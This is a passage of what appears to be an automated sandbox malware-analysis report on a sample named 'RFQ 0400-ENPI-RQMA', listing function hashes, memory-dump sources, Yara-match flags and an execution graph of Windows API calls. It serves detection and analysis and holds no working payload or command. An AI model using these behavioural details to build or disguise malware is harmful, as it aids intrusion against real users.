                                                                                      • Instruction Fuzzy Hash: 7BE117B4E001198FDB14DFA9D5849AEFBB2FF89304F24C169E414AB356DB30A941CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2A1F0 Relevance: .3, Instructions: 272COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cca014e59ebfa9275a2eb4774a8e2a67d3ea77fcb74c4ec4764e03d13ef5ab83
                                                                                      • Instruction ID: 33e1a3f956cb171d002246f3ad4fc157a3b396de3721c0d5c20a1d9d0c6fc04e
                                                                                      • Opcode Fuzzy Hash: cca014e59ebfa9275a2eb4774a8e2a67d3ea77fcb74c4ec4764e03d13ef5ab83
                                                                                      • Instruction Fuzzy Hash: 09D1E831D2075A9ECB00EB68D994A99F771FF95300F6087AAD00977251FB706AC9CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2A200 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7f57daee2bcd3e1b1dcadb82b440fe1ea5a934d669f7b94ab090fe80dc97400
                                                                                      • Instruction ID: d330e605b7b0a7ad027f649e14d29d357f7642e0d528cd511be771e123c5a9d7
                                                                                      • Opcode Fuzzy Hash: b7f57daee2bcd3e1b1dcadb82b440fe1ea5a934d669f7b94ab090fe80dc97400
                                                                                      • Instruction Fuzzy Hash: 58D1D731D2075A9ACB10EB68D994A9DF771FFA5300F6087AAD00977250FB706AC9CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016ADA4C Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1de9b769d34881435e7fe236d302f74c9c93079a106ec7c4edd2a60e02089db
                                                                                      • Instruction ID: 86087b623dc73f3e893194929ddb56cfb226ab00b1e5602e5f77ffcff644fa97
                                                                                      • Opcode Fuzzy Hash: b1de9b769d34881435e7fe236d302f74c9c93079a106ec7c4edd2a60e02089db
                                                                                      • Instruction Fuzzy Hash: D5A16132E002098FCF15DFB5C84459EBBB2FF85300B5585AAE905AB255DB71ED55CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2A1C9 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e67d94146e23320a754907a646a6cd50d18d80182c7318e532e830a0f17383db
                                                                                      • Instruction ID: 3b40ab6c3fa02dcf3cdecf0e8a5911091f434c99e16c552dd9369afd777b8778
                                                                                      • Opcode Fuzzy Hash: e67d94146e23320a754907a646a6cd50d18d80182c7318e532e830a0f17383db
                                                                                      • Instruction Fuzzy Hash: 43D1F931E2075A9ECB00EB68D954A9DF771FF95300F6087AAD0097B251EB706AC5CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B259A0 Relevance: .2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e2e5217390012daecd737507f4b4dccd4e352f40ff6190bbdc0fbd94ae5f402
                                                                                      • Instruction ID: 6665788a5b34ca41a8909ea36acef0dc904204998c7ee74438c02f9c3badedcb
                                                                                      • Opcode Fuzzy Hash: 3e2e5217390012daecd737507f4b4dccd4e352f40ff6190bbdc0fbd94ae5f402
                                                                                      • Instruction Fuzzy Hash: 3481F1B4E15219CFCB54CF99C58599EFBF2FF89210F24959AE419AB320D330AA52CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B23659 Relevance: .2, Instructions: 175COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73674f166e9614b4e000cdaa4fe20dea30d52151296f6fb474d65dff03730f8e
                                                                                      • Instruction ID: b73e255ec4163a0823cb11a18fe999ced634ec33efd97274b5a79996b3465027
                                                                                      • Opcode Fuzzy Hash: 73674f166e9614b4e000cdaa4fe20dea30d52151296f6fb474d65dff03730f8e
                                                                                      • Instruction Fuzzy Hash: 0E7144B5E1621A9FDB04CF99D4809EEFBF2FB89310F10806AD405AB314C3389A42DF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B26E00 Relevance: .2, Instructions: 157COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 608e96fe313132b2d9c3489ed367ceb518ef9e28a7574a69788df7be0714083f
                                                                                      • Instruction ID: 5ca96354b98158a92b657d78af73df10be0e371dfad9c77dfd966c43a61aaf39
                                                                                      • Opcode Fuzzy Hash: 608e96fe313132b2d9c3489ed367ceb518ef9e28a7574a69788df7be0714083f
                                                                                      • Instruction Fuzzy Hash: 176136B0B16A4DFFD710DFA1E286159BFB2FBC9301F6094D6C08997154DB3582A2DB09
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B26857 Relevance: .2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3588948f662c01e7016bd0561a25058e153a6c95b04adcbc561882ad4cc6414
                                                                                      • Instruction ID: 9f6749fb1335b0c53d4ae14298cfe53c7c2736e46b6de6561620ab10b95389c6
                                                                                      • Opcode Fuzzy Hash: c3588948f662c01e7016bd0561a25058e153a6c95b04adcbc561882ad4cc6414
                                                                                      • Instruction Fuzzy Hash: 3D6108B0E1521ADFDF04CF99C5819EEFBB2BF89304F24859AD419AB304D7349A429F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B28EE0 Relevance: .1, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63e9c766aaeeacb3f7a96008ace46c0f33193f4237b4ef9234218563826c0725
                                                                                      • Instruction ID: 793049602c788cbabb5e974455cf30bbb8a38249495720841fa65ba473a413d9
                                                                                      • Opcode Fuzzy Hash: 63e9c766aaeeacb3f7a96008ace46c0f33193f4237b4ef9234218563826c0725
                                                                                      • Instruction Fuzzy Hash: D05158B0E1621ADFDB04CFA6D4415EEBBF2FF89310F10942AE409B7254D7345A428F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D84CB0 Relevance: .1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0aa4987ff6887a3753d43e96b9c5722450f547e017c4db2087159cfeb413887a
                                                                                      • Instruction ID: 0c6c9858f55f15c01217c02123280d825df55734d1f324c5f73e1536b0388696
                                                                                      • Opcode Fuzzy Hash: 0aa4987ff6887a3753d43e96b9c5722450f547e017c4db2087159cfeb413887a
                                                                                      • Instruction Fuzzy Hash: 975128B0E0125A8FDB54DFA9D9845AEFBF2BF89304F24C16AD418A7316D7309941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B26BC8 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6249b1e2172dbd03f3a341e0e766ede10be36c82427db2f8401005a6c8b8c15a
                                                                                      • Instruction ID: 7927039e4ac9854a651aa57f098b00c55207472933d91a366bfe7adc6d11254e
                                                                                      • Opcode Fuzzy Hash: 6249b1e2172dbd03f3a341e0e766ede10be36c82427db2f8401005a6c8b8c15a
                                                                                      • Instruction Fuzzy Hash: FD4107B0E0121ADBDB04DFAAC4805EEFBF2FF88304F10D56AD819A7614D7349A429F54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D871E1 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 446d9c87957c4044ca4455a12b56f46c055e97c9496d891bd9f261b675e6940d
                                                                                      • Instruction ID: 6f229ce5f7f0f0508c9d959e9dc05017d622edef92564b30458455dbfd111335
                                                                                      • Opcode Fuzzy Hash: 446d9c87957c4044ca4455a12b56f46c055e97c9496d891bd9f261b675e6940d
                                                                                      • Instruction Fuzzy Hash: 62C04CA5AED104E786402ED4B6040F8F73CD68F276F213051D28FA60018620C3554545
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:1.4%
                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                      Signature Coverage:7.5%
                                                                                      Total number of Nodes:146
                                                                                      Total number of Limit Nodes:12
                                                                                      execution_graph 81533 1402b60 LdrInitializeThunk 81534 42a863 81535 42a880 81534->81535 81538 1402df0 LdrInitializeThunk 81535->81538 81536 42a8a8 81538->81536 81539 4243e3 81541 4243f2 81539->81541 81540 424436 81547 42d113 81540->81547 81541->81540 81544 424471 81541->81544 81546 424476 81541->81546 81545 42d113 RtlFreeHeap 81544->81545 81545->81546 81550 42b5a3 81547->81550 81549 424443 81551 42b5bd 81550->81551 81552 42b5ce RtlFreeHeap 81551->81552 81552->81549 81553 424053 81554 42406f 81553->81554 81555 424097 81554->81555 81556 4240ab 81554->81556 81557 42b233 NtClose 81555->81557 81563 42b233 81556->81563 81559 4240a0 81557->81559 81560 4240b4 81566 42d233 RtlAllocateHeap 81560->81566 81562 4240bf 81564 42b250 81563->81564 81565 42b261 NtClose 81564->81565 81565->81560 81566->81562 81567 42e1f3 81568 42e203 81567->81568 81569 42e209 81567->81569 81572 42d1f3 81569->81572 81571 42e22f 81575 42b553 81572->81575 81574 42d20e 81574->81571 81576 42b570 81575->81576 81577 42b581 RtlAllocateHeap 81576->81577 81577->81574 81578 413c73 81579 413c8d 81578->81579 81584 417673 81579->81584 81581 413cab 81582 413cf0 81581->81582 81583 413cdf PostThreadMessageW 81581->81583 81583->81582 81585 417697 81584->81585 81586 4176d3 LdrLoadDll 81585->81586 81587 41769e 81585->81587 81586->81587 81587->81581 81588 41acd3 81589 41ad17 81588->81589 81590 41ad38 81589->81590 81591 42b233 NtClose 81589->81591 81591->81590 81592 41ddf3 81593 41de19 81592->81593 81597 41df07 81593->81597 81598 42e323 81593->81598 81595 41deab 81595->81597 81604 42a8b3 81595->81604 81599 42e293 81598->81599 81600 42d1f3 RtlAllocateHeap 81599->81600 81601 42e2f0 81599->81601 81602 42e2cd 81600->81602 81601->81595 81603 42d113 RtlFreeHeap 81602->81603 81603->81601 81605 42a8d0 81604->81605 81608 1402c0a 81605->81608 81606 42a8fc 81606->81597 81609 1402c1f LdrInitializeThunk 81608->81609 81610 1402c11 81608->81610 81609->81606 81610->81606 81611 401ab8 81612 401ad5 81611->81612 81615 42e6b3 81612->81615 81618 42cd13 81615->81618 81619 42cd36 81618->81619 81630 407243 81619->81630 81621 42cd4c 81629 401b45 81621->81629 81633 41aae3 81621->81633 81623 42cd6b 81624 42cd80 81623->81624 81648 42b5f3 81623->81648 81644 427303 81624->81644 81627 42cd8f 81628 42b5f3 ExitProcess 81627->81628 81628->81629 81651 4163a3 81630->81651 81632 407250 81632->81621 81634 41ab0f 81633->81634 81662 41a9d3 81634->81662 81637 41ab3c 81639 42b233 NtClose 81637->81639 81641 41ab47 81637->81641 81638 41ab70 81638->81623 81639->81641 81640 41ab54 81640->81638 81642 42b233 NtClose 81640->81642 81641->81623 81643 41ab66 81642->81643 81643->81623 81645 42735d 81644->81645 81647 42736a 81645->81647 81673 4181c3 81645->81673 81647->81627 81649 42b610 81648->81649 81650 42b621 ExitProcess 81649->81650 81650->81624 81652 4163ba 81651->81652 81654 4163d3 81652->81654 81655 42bc93 81652->81655 81654->81632 81657 42bcab 81655->81657 81656 42bccf 81656->81654 81657->81656 81658 42a8b3 LdrInitializeThunk 81657->81658 81659 42bd24 81658->81659 81660 42d113 RtlFreeHeap 81659->81660 81661 42bd39 81660->81661 81661->81654 81663 41a9ed 81662->81663 81667 41aac9 81662->81667 81668 42a953 81663->81668 81666 42b233 NtClose 81666->81667 81667->81637 81667->81640 81669 42a970 81668->81669 81672 14035c0 LdrInitializeThunk 81669->81672 81670 41aabd 81670->81666 81672->81670 81674 4181ed 81673->81674 81675 41865b 81674->81675 81681 413da3 81674->81681 81675->81647 81677 4182fa 81677->81675 81678 42d113 RtlFreeHeap 81677->81678 81679 418312 81678->81679 81679->81675 81680 42b5f3 ExitProcess 81679->81680 81680->81675 81682 413dc2 81681->81682 81683 413f17 81682->81683 81685 413ee0 81682->81685 81690 4137f3 LdrInitializeThunk 81682->81690 81683->81677 81685->81683 81691 41adf3 81685->81691 81687 41adf3 3 API calls 81688 413f0d 81687->81688 81688->81677 81690->81685 81692 41ae18 81691->81692 81698 428953 81692->81698 81694 41ae3e 81696 413ef4 81694->81696 81697 42d113 RtlFreeHeap 81694->81697 81703 41ac33 LdrInitializeThunk 81694->81703 81696->81683 81696->81687 81697->81694 81699 4289b0 81698->81699 81700 4289e3 81699->81700 81704 413833 81699->81704 81700->81694 81702 4289c5 81702->81694 81703->81694 81705 4137f8 81704->81705 81707 413847 81704->81707 81709 42b4b3 81705->81709 81707->81702 81710 42b4cd 81709->81710 81713 1402c70 LdrInitializeThunk 81710->81713 81711 413815 81711->81702 81713->81711 81714 418878 81715 42b233 NtClose 81714->81715 81716 418882 81715->81716

                                                                                      Executed Functions

                                                                                      Function 00417673 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                      • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                                                                                      • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                      • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042B233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                      • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                                                                                      • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                      • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                                                      • Instruction ID: 40f2871b52f63c88f4cc1c547e67aebb1aa290b211a99a4ba27bdc265d11c441
                                                                                      • Opcode Fuzzy Hash: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
                                                                                      • Instruction Fuzzy Hash: 4190023264550503D10071584514706200597E1241F65C412A0424569DC7A58A5166A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 367 1402b60-1402b6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                                                      • Instruction ID: f7abb23741fb9631f90feba312cfc9c607e7d2b337425d0ce8d941c3e46450b8
                                                                                      • Opcode Fuzzy Hash: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
                                                                                      • Instruction Fuzzy Hash: 4C90027224240103410571584414616500A97F1241B55C022E1014591DC73589916225
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 369 1402df0-1402dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                                                      • Instruction ID: f5e6ed4886cc5ef95be3475614219ccbdc8723122e8b6fd04ba2f711a0c1abc2
                                                                                      • Opcode Fuzzy Hash: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
                                                                                      • Instruction Fuzzy Hash: 6590023224140513D11171584504707100997E1281F95C413A0424559DD7668A52A221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01402C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 368 1402c70-1402c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
                                                                                      • Instruction ID: be69cc9455e01c74c08b05459a173eb290fec0238755d42d11526a71eff1a902
                                                                                      • Opcode Fuzzy Hash: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
                                                                                      • Instruction Fuzzy Hash: E790023224148903D1107158840474A100597E1341F59C412A4424659DC7A589917221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00413C6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: C3vB7APK$C3vB7APK
                                                                                      • API String ID: 1836367815-224894077
                                                                                      • Opcode ID: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                      • Instruction ID: 5a9376cf19c71376eb6dcd9ad07240282008403dba884ccb0a10c61fd27c35d5
                                                                                      • Opcode Fuzzy Hash: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                      • Instruction Fuzzy Hash: 1B114872D0415C7AEB10ABE59C82DEFBB7CDF406A8F048069FE1077141D5685F0687E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00413C73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: C3vB7APK$C3vB7APK
                                                                                      • API String ID: 1836367815-224894077
                                                                                      • Opcode ID: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                      • Instruction ID: 4273e9db8a055284bf7aad7e038a2b9a4781de0a78bbed76330aa2944e199f6c
                                                                                      • Opcode Fuzzy Hash: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                      • Instruction Fuzzy Hash: CC0104B2D0011C7AEB10ABE59C82DEFBB7CDF40698F058069FA14B7241D5685F068BE5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042B5A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1926547005.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID: !dA
                                                                                      • API String ID: 3298025750-3330550368
                                                                                      • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
